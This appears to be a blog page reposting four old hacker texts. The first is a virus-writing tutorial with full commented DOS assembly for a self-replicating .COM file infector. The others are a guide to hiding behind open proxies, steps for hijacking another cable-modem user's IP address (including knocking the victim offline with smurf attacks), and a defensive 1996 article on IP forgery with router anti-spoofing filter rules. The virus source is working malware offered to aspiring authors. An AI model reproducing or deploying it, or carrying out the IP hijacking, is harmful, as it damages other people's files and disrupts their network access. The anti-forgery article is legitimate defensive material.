Wednesday, July 18, 2007

Virus programming (basics) #1

Virus programming (basics) #1...
-----------------------------------------------------------------
This section is dedicated to those who would like to write a
virus, but don't have the knowledge to do so. First of all,
writing a virus is no big deal. It is an easy project, but one
which requires some basic programming skills, and the desire to
write a virus! If either of these is missing, writing a virus
would be tedious indeed!.

Well, if you meet these requisites, keep reading this article....

JE READ
JNE FUCK_YOU!
READ:

The survival of a virus is based in its ability to reproduce. "So
how the fuck do I make a program reproduce?", you might ask.
Simple, by getting it to copy itself to other files....

The functional logic of a virus is as follows:

1- Search for a file to infect
2- Open the file to see if it is infected
3- If infected, search for another file
4- Else, infect the file
5- Return control to the host program.

The following is an example of a simple virus:

;****************************************************************
; START OF THE EXAMPLE:
;****************************************************************
;Warning, this example is a (piece of shit?)
; - The virus does not test for prior infection
; - it searches only for the first .COM file in the current
; directory
;
; Careful when executing this file, since the first time it's
; executed it will search for and infect the first file in the
; directory. If we later run the newly infected file, it will find

; the first file in its directory, itself. Thus, it will re-infect

; itself over and over.
;===================CODIGO=======================================
;(The variables in a .COM file are relative to offset 100h).

codigo segment 'code'
org 100h ;Organize all the code starting
; from offset 100h
assume cs:codigo,ds:codigo,es:codigo ;Define the use of the
;segments

start proc far ;Start the routine
COMIENZO:
push cs ;Store CS
push cs ;Store CS
; once again.
pop ds ;Bring DS out from stack
pop es ;Bring ES out from stack

call falso_proc ;Call proc. so that its
; address is placed in the stack
falso_proc proc near
falso_proc endp

pop bp ;BP<== Proc. address. sub bp, 107h ;BP<== BP - Previous directory ;This is done to take the variables relative to BP, since the ;infection displaces the variables at exactly the length of the ; file. At the first infection, instruction "SUB BP, 107h" is ; 107h, so that the contents of BP is 0; when I call a variable ; with "BP+VARIABLE" the value of the variable's address is not ; modified. When I load it , for example, from a 100h byte ; infected file, the instruction "SUB BP, 107h" leaves me at ; address 207h which means BP=100h, the size of the original file. ; Had I called the variable without adding BP, I would have been ; short by 100h bytes. ;Find the first .COM file in the directory ----------------------------------------- mov ah, 4eh ;Search for the 1st file lea dx, bp+file_inf ;DS:DX= offset of FILE_INF ;(*.*) so it will search all ;the files, including directory ;names with extensions. mov cx, 0000h ;Entry attributes int 21h ;These attributes mentioned in the commentary are the directory's ; entry attributes. When I set the attributes to 0, I'm telling ; DOS to search normal files. If I include a bit combination which ; provides the Hidden, System or Directory attributes, DOS will ; search for files with those attributes, as well as the normal ; files. If the search range includes the Volume bit, the search ; is limited to that.

;These are the bits which correspond to each attribute:
;Bits: 7 6 5 4 3 2 1 0
; . . . . . . . 1 Bit 0: Read only
; . . . . . . 1 . Bit 1: Hidden
; . . . . . 1 . . Bit 2: System
; . . . . 1 . . . Bit 3: Volume
; . . . 1 . . . . Bit 4: Directory
; . . 1 . . . . . Bit 5: File
;
;Bits 6 and 7 are not used as they are reserved for "future
; applications".

;Open file
;----------------------------------------------------------------
mov ah, 3dh ;Open the file.
mov al, 00000010b ;read/write.
mov dx, 009eh ;DX<== DTA(filename) offset int 21h ;put the handle in AX push ax ;and store in stack. ;The attributes I'm setting in AL are not the same as before. ; These are the "open" attributes. We are only interested in the ; first 3 bits, ;bits 2 1 0: ; ; 0 0 0 Read only mode ; 0 0 1 Write only mode ; 0 1 0 Read/Write mode ; ;OK, we now have the file attributes stored in AL. What we now ; need to do is to store in DX the offset of the variable where ; I've stored the ASCIIZ chain with the name of the file to be ; opened. In this case, we don't have a NAME_OF_FILE variable. ; Instead, the name is located in the DTA (Disk Transfer Area). I ; we have it in the DTA...... Why? Simply because when we search ; for a file to infect, all the information we need is returned to ; this memory area. This buffer, if it was not reset, is found in ; the PSP; more precisely, it starts at offset 80h and is 43d bytes ; in size. ; ;The DTA format is as follows: ; ;Offset Bytes Function ; 00h 21d Used by DOS for the 4fh service ; (search for the next file) ; 15h 01d Attributes of the file that's been found ; 16h 02d File time ; 18h 02d File date ; 1Ah 04d File size in bytes ; 1Eh 13d File name in an ASCIIZ chain ; (FILENAME.EXT),0 ; ;Well, all that remains to be doe is to give DX the position in ; memory where I've stored the filename: "MOV DX, E1h" and its's ; done. But careful now, remember that DTA starts at offset 80h, ; which means I have to pass to DX the value "80h+1Eh = 9Eh". That ; would than leave "MOV DX, 9Eh"; the problem is solved. Now you are probably asking yourselves what I mean by "handle". The handle is a number which tells DOS which file we want. DOS gives us a handle for each file we open so we have to be careful to have the correct handle for each file which we read/write. ;Read the first 3 bytes. ----------------------------------------------------- pop bx ;I take the handle from the ;stack to BX push bx ;and I store it again. mov ah, 3fh ;Read file. mov cx, 0003h ;Read 3 bytes. lea dx, bp+buffer ;and store in the buffer. int 21h INFECTAR: ;(infect) ;Move pointer to the start. --------------------------------------------------- mov ax, 4200h ;I move the write pointer ;to the beginning of the program mov cx, 0000h mov dx, 0000h int 21h ;The pointer's displacement, relative to the position of the ; pointer as specified in AL, is placed in CX and DX. ; Pointer displacement modes set in AL: ; AL <== 00 Move pointer to the beginning of the file. ; AL <== 01 leave pointer where it is. ; AL <== 02 Move pointer to end-of-file. ;Write the first byte (jmp) ------------------------------------------------- mov ah, 40h ;write the first byte. mov cx, 1d ;Quantity=1. lea dx, bp+jump ;DX<== JUMP offset int 21h ;(Here we still need the handle, but we don't need to set it again ; because the register which contained the information was not ; modified. ; ;The first byte to be written is a JUMP instruction (the symbol for ; the jump is below). What follows the jump is the address of the ; jump, file-length + 1. (test the "+ 1" thoroughly, since this ; can cause problems; if so, multiply by 18 or subtract 23.) ; Hehehehe. ;Since the entire virus code is copied at the end of the file, the ; jump gives the virus control in an infected file. ;Calculating file length ------------------------------------------------- mov cx, 2 ;Copy 2 bytes. mov si, 009ah ;SI<== DTA offset lea di, bp+longitud ;DI<== File LENGTH offset. rep movsb ;Copy. ;This instruction must have the 'SOURCE' buffer address in DS:SI ; and the address where the string will be copied in ES:DI (in this ; case, I copy the file length of the DTA to the variable ; 'LONGITUD'). sub word ptr [bp+longitud], 3 ;subtract 3 bytes from ;[LONGITUD] ;The JMP is completed -------------------------------------- mov ah, 40h ;Write. mov cx, 2d ;Number of bytes. lea dx, bp+longitud ;DX<== LONGITUD (length) ; offset int 21h ;Move pointer to end ------------------------------------------------------- mov ax, 4202h ;Move the write pointer to the ;end of the program. mov cx, 0000h mov dx, 0000h int 21h add word ptr [bp+longitud],3 ;Restore LONGITUD. ;Copy the virus to the program. --------------------------------------------------- pop bx ;Restore the handle. mov ah, 40h mov cx, 190d ;number of bytes to copy. lea dx, bp+comienzo ;Start copying from.... int 21h ;Close the file after infection ------------------------------------ mov ah, 3eh ;Close file. int 21h ;Here, too, we need in DS:DX the address of the buffer which ; contains the filename string, but in this case DS and DX already ; contain those values from before. NO_INFECTAR: ;==================RETURN CONTROL TO THE HOST===================== ;Copy the buffer which contains the first 3 bytes of the file into ; memory. ------------------ mov cx, 0003h ;Number of bytes (3). mov di, 0100h ;DI<== offset 100h. Beginning of the ;program in memory. lea si, bp+buffer ;SI<== BUFFER offset rep movsb ;Copy. ;What we are doing here is to "fix" the file, since when it was ; infected, the first few bytes are overwritten by the virus. That ; is why we reconstruct the file to its original state, by copying ; the first 3 bytes, which we had stored earlier, into memory. ;Jump to offset 100h -------------------------------------------------------- mov ax, 0100h ;Address needed to execute the host jmp ax ;As we mentioned before, in .COM files the executable code begins ; at offset 100h. The information found between 00h and 100h is ; program data, like the DTA for example. ;The main difference between a .COM file and an .EXE is that a .COM ; cannot occupy more than one memory segment, or 65535 bytes. ; .EXEs can, because DOS can 'tailor' them to fit into a number of ; different segments. Unlike.EXE files. .COM files are faithful ; reproductions of the contents of memory. ;====================DATA AREA=================================== buffer db 7d dup(0) longitud db 2 dup(0) file_inf db '*.COM',0 jump db 'é',0 ;<----jump ascii ;(The character '0' is the end of the ASCIIZ string) start endp ;End of main procedure codigo ends ;end of code segment end comienzo ;END. Go to COMIENZO ;**************************************************************** ; END OF EXAMPLE ;**************************************************************** Drako.




Wednesday, June 13, 2007

[----Stay anonymous on the web------]

..By MAx member of :MPD: (c) 1998 MAx [4d5044]

Note..This tutorial will teach a average day user how to keep all his
Esentual info limited so attacks from Hackers cant be made

SHouth outs: Myth leader of MPD u rule dude,All members of MPD, and
everyone else who i should shout out too u know who u are.

The topics..
1.What are packets.
2.Getting a http proxy.
3.How http proxy work.
4.How to secrure http packets.
5.How to edit what o's and mozilla info send.
6.Getting a socket proxy.
7.How socket proxy work.
8.Cookies.
9.Final note.
-----------------------------------------------------------------------

1.What are packets.

Packets are very simple on the net There are millions of user's now for
secrurity and other reasons there must be ways of establishing difference
between user's Thus is done by packets, Packets are used when ever u connect
to a remote server/system Its identify's who is connecting.
An example of a http packet.( [Connect from MAx.mpd.com]
[206.14.13.32] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 1998 at 14:34:45 )
Now ill tell u what it is saying if u dont know.
*Note*(Http packets is the way u are sending info through the web
browser whenever u connect to a server/mechine/site )
[connected from MAx.mpd.com]-This is my host
[206.14.13.32]- is my ip
(Mozilla/4.05)- is the version of mozilla im using
(X11;I;Linux 2.0.32 i586)- Is The O's(operating system) And version of
the o's im running
[On december 2, 1998 at 14:34:45] - is day/year/time
Now u know how it works this is one way Hackers get all the info they
need on your computer to hack it.
Now we dont want this anymore THus anonymous proxies where invented to
give keep user's on the net secrure.Using anonymous proxies isnt
100% secrure as the hacker can still do means on getting your real
ip/host/os ill talk about that later but it makes it very hard for a hacker
to get your ip/host once behind a proxy.
Now http isnt the only means of packets there are also socket packets which
ill talk about later.

2.How http proxy work.
A http proxy works like server it is actuelly and what it does is when
setup in your browser when ever u want to go to sites.It will connect
to there proxy server first then the proxy server conncts to the site
u want to go to THus leaving no evendence of u on the site just the
proxy server.(Dont worry once u setup a proxy dont think u always have
to type in the proxy in first then go to there and type the site u want
too go to. :)It dont work like that once u have entered the proxy settings
in ya browser it will auto do the proxy for u all u have to do is surf the
net.(Setting up a http proxy descussed later)

3. Getting a http proxy
Http proxies are very easyly found on the net as there are many
commited Http proxy server's around that are free.
Ill give a list of some http proxies for your all sorry if your
country proxy isn't here just search on the net for (Http proxy)
and ull find one.
***Austria*** Port
cache02.netway.at :80
mail.ppl.co.at :8080
speth08.wu-wien.ac.at :8080
pong.ping.at :8080

***Australia***
proxy.gwbbs.net.au :80
chrome.one.net.au :8080
proxy.newave.net.au :8080
ws.edi.com.au :80
mimas.scu.edu.au :80
proxy.omcs.com.au :8080
jethro.meriden.pas.com.au:8080
albany.jrc.net.au :80
basil.acr.net.au :8080

***Belgium***

cache-mar.belbone.be :80

***Bulgaria***

conan.gocis.bg :8080

***Brazil***

200.250.14.5)ct-nt-02.cybertelecom.com.br :8080
sanan.com.br :8080

***Canada***
proxy.collegemv.qc.ca :8080
srvprx.cspaysbleuets.qc.ca :80
valliere.csvalliere.qc.ca :80
keeper.albertc.on.ca :8080
cproxy1.justice.gc.ca :80
proxy.cslouis-hemon.qc.ca :8080
gateway.kwantlen.bc.ca :80

***Switzerland***

cache1.worldcom.ch :8080
cache2.worldcom.ch :8080
cache3.worldcom.ch :8080
web-cache-2.cern.ch :80
proxy.span.ch :8080
gip-lausanne-nc.globalip.ch :80
gip-lausanne-cf2.globalip.ch :8080
gip-lausanne-cf1.globalip.ch :8080
proxy2.iso.ch :8080
proxy.iprolink.ch :80

***China***

proxy.szptt.net.cn :8080
***United States***

hpux.mesd.k12.or.us   :8080
gatekeeper.ci.slc.ut.us :8080
episd.elpaso.k12.tx.us :8080
svc.logan.k12.ut.us       :8001
proxy.eup.k12.mi.us :8080
svc.nues.k12.ut.us :8001
proxy.eup.k12.mi.us :8080
(207.78.252.100)oakweb.oak-web.washington-ch.oh.us :80
homnibus.nvc.cc.ca.us :80
et.mohave.cc.az.us :80

(ok id say i gave out enough if ya local country not there go search
the net and if cant find use another country one that is close to u)

4.How to secrure Http packets
Like i said before this is a normal http packet
( [Connect from MAx.mpd.com]
[206.14.13.32] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 1998 at 14:34:45 )
Now to Make your ip and host anonymous to web browsing we are going to
use http proxy with ya browser.THis is done by going to ya options
and finding the info on proxy settings in thus put in all
avalable places in proxy setting etc.ftp,http,secruity,
Except leave sockets part blank THis isnt a socket proxy its a http
Now after setting up a proxy in the proxy settings and putting in the
port too.Our new packets will look like this.
( [Connect from The_proxies_host]
[The_proxies_ip] (Mozilla/4.05 [en] (X11;I;Linux 2.0.34 i586) on December
2, 1998 at 14:34:45 )
Now u might be thinking cool :) No longer have everdence of me on there
server but dam they know my o's and version of mozilla later on ill
descuse how to change that.U might also be thinking WOW now i can surf
100% secure on the net.U are not totally right.IF a hacker had a real
grunge on u.He has now the proxy u are using there ip/host
now if he wants to get your info that badly he would have to hack
the proxy server comapare the log time of the time u loged to the hacker's
site too the logs of your connection to the proxy server.THus is a real
big job and if pick a good proxy server they will be very secure from
attack's So your pritty much safe.

5.How to edit the o's and mozilla info send.

Ok if your using Ie this is how u would do it.
To see Original Settings
GOTO HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
User Agent = Mozilla/4.0 (compatible; MSIE 4.01; Windows 95; (Your Orginial Settings))

(Skip this Part here)
GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
ProductName = Microsoft Windows 95
Version = Windows 95


GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
(Your Orignial Settings Here) = IEAK(Your Orignial Settings Here)

Example

GOTO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
Myth [Unix-Base] = IEAKMyth [Unix-Base]


*Note (this info on how to change the mozilla and version shown was
given to me from Myth i didn't make it.)

6.Getting a socket proxy.

Ok now socket proxies work like Http proxies the only diff is
socket proxies are used with programs like (icq,mirc) And the packets
are send through sockets not http.Getting a socket proxy is alot harder
because Socket proxy server's have to be dedicated to a sertain program
so its very limiting to the amount of user's he will get.
Http is always used its using the web everyone uses it so http proxies
are always going to be in need.
TO find a socket proxy u can search the net typing in (Socket proxy)
or try for sertain program's names like (Icq proxy).
Hopefully u will get one
socket proxies are useful as alot of attacks on user's are done
by kids with nukes,spring,ping,smurf,etc etc And thus will anoy a user
in mirc or from icq both these programs give any user possability to
get a user's ip/host.
thats why if u use these u will want a socket proxy.
Alot of people go why dont u just use ident or jizz or something
for mirc and icq.Well the reason u don't as there are expolits out
there to crash spoofed hosts/ip for programs like jizz and ident
a proxy is more stable way and more prevention then a spoofer program.





Wednesday, May 23, 2007

Cable Modem IP Hijacking in Win95/98

Cable Modem IP Hijacking in Win95/98

The purpose of this is to show you how bad cable modems security is and that
even with a win box you can take someone else's IP. You can hijack IP's using
a cable modem and it's very simple in any operating system. Just follow the
steps:

1) Choose someone's IP that you wish to have. Make sure the IP is on the same
network. Most cable modem providers use DHCP. The fist thing you have to
do is find the victims IP. Remember the victims IP has to be in the same
network and with the same service provider for this to work.

2) Now this is probably the hardest thing in this file (but it's still easy),
you have to wait until the victims computer is off or you can Smurf kill
his connection. When you think his computer is off-line just try to ping
it to see if you get a response. Do this by going to a DOS prompt and
typing "ping ". If you get a response then you have to try
harder.

After you get his PC off-line then you go into your network properties and
edit the IP settings, but instead of having yours there you put the victims
IP, host, and domain.

3) Restart. If you restart and you get an IP conflict this means that the
victims computer is on, if you don't get an IP conflict then try to go to
your web browser and see if it works. With some cable modem providers you
might have to also add the Gateway, Subnet mask (255.255.55.0), Host, DNS
search, and Domain.

Now you can go. Everything will work until the victims PC is back on. Once it is
back online it will take the IP away because it will tell you that you have the
wrong Mac addresses.

*Linux*
This is also possible in Linux, but is not the best way. You can change your Mac
address to the victims PC and this is more secure and much easier. There are a
couple of scripts to change your address, just look around.

Warning: Some cable modem service providers will know when you're using the wrong
IP, but hey, it might be useful.

Copyright (c) 1999 Wildman
www.hackcanada.com

Monday, May 7, 2007

INTERNET HOLES - ELIMINATING IP ADDRESS FORGERY

INTERNET HOLES - ELIMINATING IP ADDRESS FORGERY
COPYRIGHT (C), 1996, MANAGEMENT ANALYTICS - ALL RIGHTS RESERVED
_________________________________________________________________

The Internet is now the world's most popular network and it is full of
potential vulnerabilities. In this series of articles, we explore the
vulnerabilities of the Internet and what you can do to mitigate them.

An Introduction IP Address Forgery

The Internet Protocol (IP) (RFC791) provides for two and only two
functions. It defines a datagram that can be routed through the
Internet, and it provides a means for fragmenting datagrams into
packets and reassembling packets into the original datagrams. To quote
from RFC791:
The internet protocol is specifically limited in scope to provide the
functions necessary to deliver a package of bits (an internet
datagram) from a source to a destination over an interconnected
system of networks. There are no mechanisms to augment end-to-end
data reliability, flow control, sequencing, or other services
commonly found in host-to-host protocols. The internet protocol
can capitalize on the services of its supporting networks to
provide various types and qualities of service.

Here's a description of an IP datagram, also from RFC791:

0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
\ \
\ \
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of an IP Datagram



Note that the 4th line of the description calls for the Source Address
of the datagram. In the simplest form of IP address forgery, the
forger only needs to create a packet containing a false Source Address
and insert it into the Internet by writing it into the output device
used to send information to the rest of the Internet. For the
non-expert forger, there is a tool called iptest which is part of the
free and publicly available ipfilter security package that
automatically forges packets for the purpose of testing configurations
or routers and other IP security setups.

The infrastructure of the Internet consists primarily of a set of
gateway computers and packet routers. These systems have multiple
hardware interfaces. They maintain routing tables to let them decide
which output interface to send a packet out on based on the input
interface that it came in on and the destination IP address specified
in the packet. When a forged packet arrives at an infrastructure
element, that element will faithfully route the packet toward the
destination address, exactly as it would a legitimate packet.

How Can IP Address Forgery Be Used



At its root, IP address forgery is a method of deception, and thus it
can be used in much the same way as other forms of deception.
Dunnigan95 More specifically, and using Dunnigan and Nofi's
classification scheme, here are some quick ideas about how IP address
forgery might be used:
* Concealment: IP address forgery is commonly used to conceal the
identity of an attacker, especially when denial of services is the
goal of the attack.
* Camouflage: IP address forgery is used to make one site appear to
be another as a way to convince the victim, for example, that an
attack is from a University, when in fact it is from a competitor.
* False and Planted Information: IP address forgery can be used to
create the impression that a particular site is acting maliciously
in order to create friction or lead a defender to falsely accuse
an innocent third party.
* Reuses: IP address forgery can be used to support another activity
designed to gain the confidence of the defender. For example, a
salesperson for information security products could create IP
address forgeries in order to convince a client of the need for
their services.
* Displays: IP address forgery has been used in order to lead
defenders to believe that many sites are participating in an
attack when in fact only a small number of individuals are
responsible.
* Demonstrations: IP address forgery has been used to demonstrate a
potential for untraceable attacks as a way to convince defenders
not to try to catch attackers.
* Feints: IP address forgery can be used to try to fool an enemy
into believing that an attack is coming from outside or from a
particular direction, when the real attack is very different. This
is a way to misdirect the enemy into spending limited resources in
the wrong way.
* Lies: IP address forgery has been used to create a more convincing
lie that somebody known to the defender is communicating with them
about a particular matter.
* Insight: IP address forgery can be used to gain insight into how
an opponent reacts and as a sort of probe to determine what sorts
of responses are likely to arise.



Another way to view this issue is in terms of the net effect on
information in information systems. Here is another way of viewing
this issue with an example from each category.
* Corruption of Information: IP addresses are often used as the
basis for Internet control decisions. For example, DNS updates are
often designated as coming only from specific other servers. With
IP address forgery, the entire DNS system could be corrupted,
causing services to be rerouted through enemy servers.
* Denial of Services: The Internet is basically a fragile network
that depends on the proper behavior and good will of the
participants for its proper operation. Without wide-ranging
changes to the way the Internet works, denial of services is
almost impossible to prevent. For example, the same DNS attack
could be used to cause widespread denial of services, or perhaps
even to create loops in the packet delivery mechanisms of the
Internet backbone.
* Leakage of Information: Forged IP addresses can be used to cause a
host to take orders for the delivery of information to enemy sites
by forging authorization as if it were from a legitimate
authorizing site.
* Misplaced Liability: Forged IP addresses could be used, as
described above under False and Planted Information, to cause
defenders to assert claims against innocent bystanders and to lay
blame at the wrong feet.

These are only some of the examples of what forged IP addresses can
do. Without a lot of effort, many other examples can be created.

What Can We Do About It?

As individuals, there is little we can do to eliminate all IP address
forgery, but as a community, we can be very effective. Here's how.
Instead of having all infrastructure elements route all packets, each
infrastructure element could, and should, enforce a simple rule. They
should only route packets from sources that could legitimately come
from the interface the packet arrives on.

This may sound complicated, but it really isn't. In fact, the
technology to do this is already in place, and always has been.
Virtually every router and gateway in existence today allows for the
filtering of packets based on their input interface and IP source and
destination address. This is a necessary component of their operation
and is the basis for the way they route all packets.

The only change that has to be made is for these routers and gateways
to enforce the network structure that is legitimately in place. Or in
other words, the routers and gateways should refuse to route
ridiculous packets. Here are some of the simpler examples of known bad
packets:
* The IP address 127.0.0.1 is ONLY used for internal routing of
packets from a host to itself. There is no legitimate IP datagram
that should pass through a router or gateway with this as the
source address. In fact, routing these packets is dangerous
because they may be used to forge packets from the localhost which
often has special privileges. A recent attack that causes denial
of services involves sending a packet to a host's echo port with
127.0.0.1 as its source address and the echo port as it's source
port. The echo port causes whatever packet it is sent to be
returned to its source. Since the source address is the same port
on the same host, this packet creates an infinite loop which, in
many cases, disables the computer.
* The IP address 0.0.0.0 is not legitimate - full stop. In fact,
there's really no legitimate IP address that should traverse
gateways containing a 0 for one of the address elements.
Unfortunately, many routers use the '.0.' convention in their
filtering tables to indicate any address from 0 to 255 (the whole
range), so blocking these packets may be non-trivial in some
infrastructure elements.
* The IP specification includes provisions for private subnetworks
that are designated for internal use only. There is no legitimate
reason to route packets from these addresses anywhere in the
general Internet infrastructure. (RFC1597) These address ranges
include 10.*.*.*, 172.16-32.*.*, and 192.168.*.* (where *
indicates any value from 0 through 255). No packets should be
routed through the Internet with these addresses as either their
source or their destination.

The next step in eliminating IP address forgery is for the routers and
gateways at each type of infrastructure element to enforce standards
on each interface. Generally, the Internet is broken up into Backbone
providers that provide wide area packet transport services, Private
Networks which are owned and operated by companies, institutions,
government agencies, and other parties for their own purposes, and
Internet Service Providers (ISPs) that provide connections between
the backbone elements and private networks (sometimes including other
ISPs). These roles can be blurred at times, but they are adequate for
our purposes.
* Private Networks: Each private network should;
+ 1) prevent all of the known-bad packets from crossing into or
out of the organization,
+ 2) prevent packets with internal source addresses from
passing inward,
+ 3) prevent packets with external source addresses from
passing outward,
+ 4) prevent packets with external destination addresses from
passing inward, and
+ 5) prevent packets with internal destination addresses from
passing outward.
* ISPs: Each ISP should;
+ 1) prevent all of the known-bad packets from crossing into or
out of their infrastructure,
+ 2) prevent any packet inbound from any of their clients with
a source address not from that client's assigned address
range from passing from the client network,
+ 3) prevent any packets with a destination address not in
their client's address range from passing to the client
network,
+ 4) prevent any packet not from this ISP's legitimate address
range from entering the backbone, and
+ 5) prevent any packets originating from the backbone and not
destined for one of their legitimate IP addresses from
entering their network.
Two additional rules will assist the ISP's clients;
+ 6) prevent inbound traffic from the client with the client's
address as a destination, and
+ 7) prevent outbound traffic to the client with the client's
address claimed to be the source.
* Backbone Networks: Each backbone provider should;
+ 1) prevent all of the known-bad packets from crossing into or
out of their infrastructure,
+ 2) prevent packets originating from any ISP with source
addresses not in that ISP's range of legitimate source
addresses from entering the backbone,
+ 3) prevent any packets not destined for an ISP's address
range from entering that ISP,
+ 4) prevent any packets from any other backbone provider that
could not be properly routed through that provider from
entering their backbone, and
+ 5) prevent any packets from going to any other backbone
provider unless they could legitimately be routed through
that provider to reach their destination.
For backbones, this requires some effort, however the high volume of
information they carry certainly justifies a little effort for
protection.

Some Examples
As an aide to the less technically inclined, the following examples
provide some real world implementation details.

This set of rules applies to a private network (in this case, the
all.net class C network 204.7.229.*) and are written in the format of
the Morningstar PPP (point to point protocol) Filter file:

# Rule 1 for private networks
# prevent known-bad address ranges from entering (or leaving)
!172.16-32.0.0 # private network segment
!192.168.0.0 # private network segment
!10.0.0.0 # private network segment
!127.0.0.0 # localhost network
# Rule 2 for private networks
# prevent internal source address packets from passing inward
!recv/src/204.7.229.0 # prevent inbound from our network
# Rule 5 for private networks
# prevent internal destination addresses from passing outward
# Note that rule 5 is placed here because the filters are order dependent
!send/dst/204.7.229.0 # prevent our destinations from passing out
# Rule 3 for private networks
# prevent external source address packets from passing outward
send/src/204.7.229.0 # allow legitimate outbound sources
!send/src/0.0.0.0 # prevent illegitimate outbound sources
# Rule 4 for private networks
# prevent external destinations from passing inward
recv/dst/204.7.229.0 # allow legitimate inbound destinations
!recv/dst/0.0.0.0 # prevent illegitimate inbound destinations

The next set of rules applies to an ISP. In this case, we assume that
the ISP has control over three class B networks that it uses to sell
services to its clients. The class B networks used in this example
have IP addresses of 123.7.*.*, 231.6.*.*, and 201.96.*.*. In this
case, we have three different parts of the example:

This is the router connecting the ISP to the backbone, presented in
the format of a Cisco router with interface 0 connected to the
backbone and interface 1 connected to the ISP's internal network. It
implements rules 1, 4, and 5 for the ISP.

# Rule 1 for an ISP
# prevent all of the known-bad address ranges
# this should be done on all in and out connections
# on all interfaces in all access control lists
All interfaces in and out
deny ip 172.16-32.0.0 # private network segment
deny ip 192.168.0.0 # private network segment
deny ip 10.0.0.0 # private network segment
deny ip 127.0.0.0 # localhost network

# Rule 2 for an ISP
# prevent inbound from client not in client's address range
# DONE ELSEWHERE

# Rule 3 for an ISP
# prevent entry of packets not destined clients from passing their way
# DONE ELSEWHERE

# Rule 4 for an ISP
# prevent exit of packets not from our class Bs
# on interface 0 (backbone) out filter
Interface 0 out
permit ip 123.7.0.0
permit ip 231.6.0.0
permit ip 201.96.0.0
deny ip 0.0.0.0

# Rule 5 for an ISP
# prevent entry of packets not destined for our class Bs.
# on interface 0 (backbone) in filter
Interface 0 in
permit ip 123.7.0.0
permit ip 231.6.0.0
permit ip 201.96.0.0
deny ip 0.0.0.0

Next, we implement rules 2 and 3 for each client by creating separate
(in this example ppp) filters on the ISP's gateway computer. Again,
using the Morningstar ppp Filter format and assuming that Class C IP
network 201.96.1.* is assigned to this particular client:

# Rule 1 for ISPs
# prevent known-bad address ranges from entering (or leaving)
!172.16-32.0.0 # private network segment
!192.168.0.0 # private network segment
!10.0.0.0 # private network segment
!127.0.0.0 # localhost network
# Rule 6 for an ISP
# prevent inbound traffic from the client destined for the client
# note that rule 6 is placed here because filters are order dependent
!recv/dest/201.96.1.0 # prevent inbound from client to self
# Rule 7 for an ISP
# prevent outbound traffic to the client claimed to be from the client
# note that rule 7 is placed here because filters are order dependent
!send/src/201.96.1.0 # prevent outbound to client from client
# Rule 2 for an ISP
# prevent inbound from client not in client's address range
recv/src/201.96.1.0 # allow legitimate traffic
!recv/src/0.0.0.0 # prevent all other traffic
# Rule 3 for an ISP
# prevent entry of packets not destined clients from passing their way
send/dest/201.96.1.0 # allow legitimate traffic
!send/dest/0.0.0.0 # prevent all other traffic

Note that redundant protection is provided in several ways. The ISP
protects the clients from backbone forgery both at the backbone router
and at the client's ppp connection, and protects the backbone from IP
forgery emanating from the ISP both by preventing forgery from clients
and by preventing forgery from within the ISP. Similarly, the ISP
provides redundant protection against improperly configured client
hardware and software. The last two filter rules are to assure that
even if the client is not properly configured to prevent forgery of
internal addresses from the outside world or to prevent internal
traffic from being sent out, this traffic is prevented.

This last example is a simplification of a wide area backbone network
in which this particular router (no type specified) is at the junction
between UK connections and non-UK connections. In this case, it is a
reasonable assumption that all internal UK traffic should remain
internal and that external traffic that gets to this node should be
sent out of the UK never to return. This particular backbone node will
be connected to non-UK traffic on interface 0, our previously
described ISP on interface 1, and the rest of the internal UK backbone
on interface 2.

# Rule 1 for a backbone
# prevent all of the known-bad packets from crossing
all-interfaces prevent in/out 172.16-32.0.0 # private network segment
all-interfaces prevent in/out 192.168.0.0 # private network segment
all-interfaces prevent in/out 10.0.0.0 # private network segment
all-interfaces prevent in/out 127.0.0.0 # localhost network

# Rule 2 for a backbone
# prevent packets originating from any ISP with non-ISP source address
interface-1 allow in from 123.7.0.0 # ISP traffic
interface-1 allow in from 231.6.0.0 # ISP traffic
interface-1 allow in from 201.96.0.0 # ISP traffic
interface-1 prevent in from 0.0.0.0 # no other inbound traffic

# Rule 3 for a backbone
# prevent packets not destined for an ISP from going there
interface-1 allow out to 123.7.0.0 # ISP traffic
interface-1 allow out to 231.6.0.0 # ISP traffic
interface-1 allow out to 201.96.0.0 # ISP traffic
interface-1 prevent out to 0.0.0.0 # no other outbound traffic

# Rule 4 for a backbone
# prevent packets from other backbones that shouldn't come this way
interface-0 allow in to UK-1 # UK traffic
interface-0 allow in to UK-2 # UK traffic
...
interface-0 allow in to UK-n # UK traffic
